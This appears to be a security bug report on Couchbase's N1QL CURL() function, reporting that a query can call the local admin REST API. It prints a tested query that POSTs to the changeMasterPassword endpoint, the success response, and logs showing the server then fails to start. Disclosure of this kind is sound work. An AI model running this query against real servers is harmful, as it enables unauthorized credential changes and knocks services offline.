Description
Attack scenario : Under what context is CURL running on the server? Can I use CURL with REST API call to reset administrator password?
Use custom header for N1QL-CURL : X-N1QL-User-Agent: couchbase/n1ql/1.7.0-N1QL
Each localhost endpoint can manually check for this header string and disable access on their end.
Tested the following :
cbq> select curl("http://Administrator:password@127.0.0.1:8091/node/controller/changeMasterPassword", {"data":"newPassword=booyaa","request":"POST"}) ;
{
"requestID": "9aab0709-3c7a-4167-909a-0438294fc4dd",
"signature": {
"$1": "object"
},
"results": [
{
"$1": null
}
],
"status": "success",
"metrics": {
"elapsedTime": "15.852872ms",
"executionTime": "15.836674ms",
"resultCount": 1,
"resultSize": 34
}
}
This should not be authorized.
If I quit Couchbase and then restart it, it gives error message saying
"Problem Running Couchbase : Couchbase server doesn’t seem to be operating properly. Check console logs for more details. "
When I see the logs in babysitter.log
ns_server:debug,2017-04-19T15:37:13.155-07:00,[babysitter_of_ns_1@127.0.0.1Sending password to gosecrets
ns_server:error,2017-04-19T15:37:13.168-07:00,[babysitter_of_ns_1@127.0.0.1Incorrect master password. Error: {error,
"cipher: message authentication failed"}